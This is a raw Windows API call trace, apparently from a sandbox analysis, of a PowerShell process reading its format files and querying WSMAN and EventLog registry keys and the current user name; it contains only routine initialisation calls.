	[0771.431] ReadFile (in: hFile=0x310, lpBuffer=0x2db6d20, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2db6d20*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0771.431] ReadFile (in: hFile=0x310, lpBuffer=0x2db7720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2db7720*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0771.431] CloseHandle (hObject=0x310) returned 1
	[0771.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.431] SetErrorMode (uMode=0x1) returned 0x1
	[0771.432] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0771.432] SetErrorMode (uMode=0x1) returned 0x1
	[0771.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.432] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0771.432] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0771.432] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da220
	[0771.432] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3da220, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0771.432] CoTaskMemFree (pv=0x1b3da220) 
	[0771.432] RegCloseKey (hKey=0x310) returned 0x0
	[0771.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.433] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3a3b0389, Data2=0x7223, Data3=0x4f20, Data4=([0]=0x90, [1]=0xaa, [2]=0x66, [3]=0xf8, [4]=0x26, [5]=0x8f, [6]=0xf3, [7]=0xd5))) returned 0x0
	[0771.433] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd89b7b8c, Data2=0x3fc, Data3=0x4640, Data4=([0]=0x91, [1]=0x23, [2]=0xf7, [3]=0x28, [4]=0xd3, [5]=0x3e, [6]=0xd9, [7]=0x8f))) returned 0x0
	[0775.061] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0775.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.061] CoTaskMemFree (pv=0x33a820) 
	[0775.061] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0775.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.062] CoTaskMemFree (pv=0x33a820) 
	[0775.062] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0775.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.062] CoTaskMemFree (pv=0x33a820) 
	[0775.062] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0775.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.062] CoTaskMemFree (pv=0x33a820) 
	[0775.065] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0775.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.065] CoTaskMemFree (pv=0x33a820) 
	[0775.066] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0775.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.066] CoTaskMemFree (pv=0x33a820) 
	[0775.066] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0775.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.067] CoTaskMemFree (pv=0x33a820) 
	[0775.070] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed038 | out: phkResult=0x1ed038*=0x310) returned 0x0
	[0775.071] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecf3c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecf38*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.071] CoTaskMemFree (pv=0x0) 
	[0775.071] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0775.071] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x382120, lpcchValueName=0x1ecfe8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ecfe8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0775.072] CoTaskMemFree (pv=0x382120) 
	[0775.072] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0775.072] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x382120, lpcchValueName=0x1ecfe8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ecfe8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0775.072] CoTaskMemFree (pv=0x382120) 
	[0775.072] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0775.072] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x382120, lpcchValueName=0x1ecfe8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ecfe8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0775.072] CoTaskMemFree (pv=0x382120) 
	[0775.072] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecfcc, lpData=0x0, lpcbData=0x1ecfc8*=0x0 | out: lpType=0x1ecfcc*=0x1, lpData=0x0, lpcbData=0x1ecfc8*=0x8) returned 0x0
	[0775.072] CoTaskMemAlloc (cb=0xc) returned 0x3f3f00
	[0775.072] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecf9c, lpData=0x3f3f00, lpcbData=0x1ecf98*=0x8 | out: lpType=0x1ecf9c*=0x1, lpData="2.0", lpcbData=0x1ecf98*=0x8) returned 0x0
	[0775.072] CoTaskMemFree (pv=0x3f3f00) 
	[0779.943] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf88 | out: phkResult=0x1ecf88*=0x2f8) returned 0x0
	[0779.943] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ece8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ece8c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece88*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.943] CoTaskMemFree (pv=0x0) 
	[0779.943] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0779.943] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x382120, lpcchValueName=0x1ecf38, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ecf38, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0779.944] CoTaskMemFree (pv=0x382120) 
	[0779.944] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0779.944] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x382120, lpcchValueName=0x1ecf38, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ecf38, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0779.944] CoTaskMemFree (pv=0x382120) 
	[0779.944] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0779.944] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x382120, lpcchValueName=0x1ecf38, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ecf38, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0779.944] CoTaskMemFree (pv=0x382120) 
	[0779.944] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecf1c, lpData=0x0, lpcbData=0x1ecf18*=0x0 | out: lpType=0x1ecf1c*=0x1, lpData=0x0, lpcbData=0x1ecf18*=0x8) returned 0x0
	[0779.944] CoTaskMemAlloc (cb=0xc) returned 0x3f4060
	[0779.944] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1eceec, lpData=0x3f4060, lpcbData=0x1ecee8*=0x8 | out: lpType=0x1eceec*=0x1, lpData="2.0", lpcbData=0x1ecee8*=0x8) returned 0x0
	[0779.944] CoTaskMemFree (pv=0x3f4060) 
	[0779.948] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0779.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0779.948] CoTaskMemFree (pv=0x33a820) 
	[0783.370] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0783.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.370] CoTaskMemFree (pv=0x33a820) 
	[0783.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x310) returned 0x0
	[0783.384] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecf2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecf28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecf2c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecf28*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.384] CoTaskMemFree (pv=0x0) 
	[0783.385] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.385] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x0, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.385] CoTaskMemFree (pv=0x382120) 
	[0783.385] CoTaskMemFree (pv=0x0) 
	[0783.385] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.385] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.385] CoTaskMemFree (pv=0x382120) 
	[0783.385] CoTaskMemFree (pv=0x0) 
	[0783.385] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.385] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x2, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.385] CoTaskMemFree (pv=0x382120) 
	[0783.385] CoTaskMemFree (pv=0x0) 
	[0783.385] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.385] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x3, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.385] CoTaskMemFree (pv=0x382120) 
	[0783.386] CoTaskMemFree (pv=0x0) 
	[0783.386] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.386] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x4, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.386] CoTaskMemFree (pv=0x382120) 
	[0783.386] CoTaskMemFree (pv=0x0) 
	[0783.386] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.386] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x5, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.386] CoTaskMemFree (pv=0x382120) 
	[0783.386] CoTaskMemFree (pv=0x0) 
	[0783.386] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.386] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x6, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.386] CoTaskMemFree (pv=0x382120) 
	[0783.386] CoTaskMemFree (pv=0x0) 
	[0783.386] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.386] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x7, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.386] CoTaskMemFree (pv=0x382120) 
	[0783.386] CoTaskMemFree (pv=0x0) 
	[0783.386] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0783.386] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x8, lpName=0x382120, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.387] CoTaskMemFree (pv=0x382120) 
	[0783.387] CoTaskMemFree (pv=0x0) 
	[0783.387] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x2f8) returned 0x0
	[0783.387] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0783.387] RegOpenKeyExW (in: hKey=0x310, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x314) returned 0x0
	[0783.387] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0783.387] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x318) returned 0x0
	[0783.387] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0783.387] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x31c) returned 0x0
	[0783.388] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0783.388] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x320) returned 0x0
	[0783.388] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0783.388] RegOpenKeyExW (in: hKey=0x310, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x324) returned 0x0
	[0783.388] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0783.388] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x328) returned 0x0
	[0783.388] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0783.388] RegOpenKeyExW (in: hKey=0x310, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x32c) returned 0x0
	[0783.389] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0783.389] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x330) returned 0x0
	[0783.389] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x334) returned 0x0
	[0783.389] RegCloseKey (hKey=0x334) returned 0x0
	[0783.389] RegCloseKey (hKey=0x310) returned 0x0
	[0783.390] RegCloseKey (hKey=0x330) returned 0x0
	[0784.154] CoTaskMemAlloc (cb=0x804) returned 0x1b3f8e10
	[0784.154] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3f8e10, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0784.160] CoTaskMemFree (pv=0x1b3f8e10) 
	[0784.161] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.161] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0784.161] CoTaskMemFree (pv=0x382120) 
	[0784.183] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x338) returned 0x0
	[0784.183] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecedc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecedc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.183] CoTaskMemFree (pv=0x0) 
	[0784.183] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.183] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.183] CoTaskMemFree (pv=0x382120) 
	[0784.183] CoTaskMemFree (pv=0x0) 
	[0784.183] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.184] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.184] CoTaskMemFree (pv=0x382120) 
	[0784.184] CoTaskMemFree (pv=0x0) 
	[0784.184] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.184] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.184] CoTaskMemFree (pv=0x382120) 
	[0784.184] CoTaskMemFree (pv=0x0) 
	[0784.184] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.184] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.184] CoTaskMemFree (pv=0x382120) 
	[0784.184] CoTaskMemFree (pv=0x0) 
	[0784.184] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.184] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.185] CoTaskMemFree (pv=0x382120) 
	[0784.185] CoTaskMemFree (pv=0x0) 
	[0784.185] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.185] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.185] CoTaskMemFree (pv=0x382120) 
	[0784.185] CoTaskMemFree (pv=0x0) 
	[0784.185] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.185] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.185] CoTaskMemFree (pv=0x382120) 
	[0784.185] CoTaskMemFree (pv=0x0) 
	[0784.185] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.185] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.185] CoTaskMemFree (pv=0x382120) 
	[0784.185] CoTaskMemFree (pv=0x0) 
	[0784.185] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.185] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.186] CoTaskMemFree (pv=0x382120) 
	[0784.186] CoTaskMemFree (pv=0x0) 
	[0784.186] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x33c) returned 0x0
	[0784.186] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
